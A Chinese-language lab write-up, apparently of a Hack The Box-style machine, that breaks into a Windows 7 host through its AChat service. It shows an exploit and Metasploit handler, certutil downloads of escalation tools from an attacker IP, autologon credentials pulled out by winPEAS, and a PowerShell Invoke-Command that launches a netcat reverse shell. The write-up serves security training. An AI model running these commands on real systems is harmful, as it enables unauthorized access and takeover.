本文作者:Twe1ve(贝塔安全实验室-核心成员)
nmap扫描结果:
PORT STATE SERVICE VERSION
9255/tcp open http AChat chat system httpd
|_http-server-header: AChat
|_http-title: Site doesn't have a title.
9256/tcp open achat AChat chat system
Achat Exploit : https://www.youtube.com/watch?v=YgC_Rl6x3aM
1.生成paylaod
kali@kali:~/tools/others/AChat-Reverse-TCP-Exploit$ bash AChat_Payload.sh
RHOST: 10.10.10.74LPORT: 4444
LHOST: 10.10.14.61
2.用生成的payload替换py脚本中的payload,并修改server_address
3.msf
use exploit/multi/handler
set payload windows/shell/reverse_tcp
...
4.python AChat_Exploit.py
###得到一个用户shell,post/multi/manage/shell_to_meterpreter ###升级为meterpreter shell,此处是升级失败
msf suggest提权模块不能获取可以提权的模块使用提权脚本看一下
由于是windows 7,使用证书下载试试看
certutil.exe -urlcache -split -f http://10.10.14.61:8000/winPEAS.exe 1.exe
certutil.exe -urlcache -split -f http://10.10.14.61:8000/ms16-075.exe 2.exe
certutil.exe -urlcache -split -f http://10.10.14.61:8000/41015.exe 3.exe
.....
提权模块都失败
winPEAS:
Some AutoLogon credentials were found!!
DefaultUserName : 35mAlfred
DefaultPassword : Welcome1!
撞一下密码:(这里没想到的是这台win 7 竟然装了powershell)
$pass = convertTo-SecureString 'Welcome1!' -AsPlainText -Force
$cred= New-Object System.Management.Automation.PSCredential("Administrator",$pass)
Invoke-Command -Computer Sniper -ScriptBlock { whoami } -Credential $cred ###验证是否是正确的凭证
Invoke-Command -Computer Sniper -ScriptBlock { dir } -Credential $cred
Invoke-Command -Computer Sniper -ScriptBlock { C:\ProgramData\nc.exe 10.10.15.64 9999 -e cmd.exe } -Credential $cred
另一种玩法:
####由于直接直接查看root.txt,只是拒绝用户访问,所以可以通过修改root.txt的文件权限来使它可读
cacls.exe c:\users\Administrator\Desktop\root.txt /c /e /t /g Alfred:F